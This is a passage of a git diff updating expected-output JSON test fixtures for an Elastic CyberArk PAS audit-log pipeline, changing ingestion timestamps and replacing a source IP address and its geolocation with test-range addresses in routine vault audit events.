{\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:18\",\"IsoTimestamp\":\"2021-03-10T22:19:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329053800Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:18\",\"IsoTimestamp\":\"2021-03-10T22:19:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", @@ -516,20 +445,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -550,7 +467,7 @@ "Auditors" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -559,8 +476,8 @@ "rfc5424": true, "iso_timestamp": "2021-03-11T17:38:14Z", "safe": "PSMRecordings", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e33\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e33\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Update Owner", "source_user": "Auditors", "message": "Update Owner", @@ -574,8 +491,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474102300Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e33\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:14\",\"IsoTimestamp\":\"2021-03-11T17:38:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329059300Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e33\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:14\",\"IsoTimestamp\":\"2021-03-11T17:38:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json index 6a5642c4086..b59939c142f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor license expiration date start", - "ingested": "2021-06-09T10:24:33.660154700Z", + "ingested": "2021-12-09T13:36:58.163764700Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"355\",\"Desc\":\"Monitor License Expiration Date start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor License Expiration Date start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor License Expiration Date start\",\"GatewayStation\":\"\"}}}", "code": "355", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json index d61c7cb5bd5..319f3cfcc3a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor license expiration date end", - "ingested": "2021-06-09T10:24:33.682528300Z", + "ingested": "2021-12-09T13:36:58.261598700Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"356\",\"Desc\":\"Monitor License Expiration Date end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor License Expiration Date end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor License Expiration Date end\",\"GatewayStation\":\"\"}}}", "code": "356", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json index 0791b48895e..13412bbe6b3 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor fw rules start", - "ingested": "2021-06-09T10:24:33.706025600Z", + "ingested": "2021-12-09T13:36:58.358906700Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"357\",\"Desc\":\"Monitor FW rules start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW rules start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW rules start\",\"GatewayStation\":\"\"}}}", "code": "357", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor fw rules start", - "ingested": "2021-06-09T10:24:33.706037Z", + "ingested": "2021-12-09T13:36:58.358915100Z", "original": "Mar 08 02:32:56 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"357\",\"Desc\":\"Monitor FW rules start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW rules start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW rules start\",\"GatewayStation\":\"\"}}}", "code": "357", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json index 0b269950ba6..9c47570daba 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor fw rules end", - "ingested": "2021-06-09T10:24:33.740907200Z", + "ingested": "2021-12-09T13:36:58.519410400Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"358\",\"Desc\":\"Monitor FW Rules end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW Rules end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW Rules end\",\"GatewayStation\":\"\"}}}", "code": "358", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor fw rules end", - "ingested": "2021-06-09T10:24:33.740920600Z", + "ingested": "2021-12-09T13:36:58.519418700Z", "original": "Mar 08 02:32:56 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"358\",\"Desc\":\"Monitor FW Rules end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW Rules end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW Rules end\",\"GatewayStation\":\"\"}}}", "code": "358", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json index f03213f7863..32bd76af23a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json @@ -102,7 +102,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776957500Z", + "ingested": "2021-12-09T13:36:58.683100800Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT USER FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=69B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT USER FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=69B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -221,7 +221,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776968300Z", + "ingested": "2021-12-09T13:36:58.683108500Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=BEGIN DBMS_OUTPUT.DISABLE\\\\; END\\\\;;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=123B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" 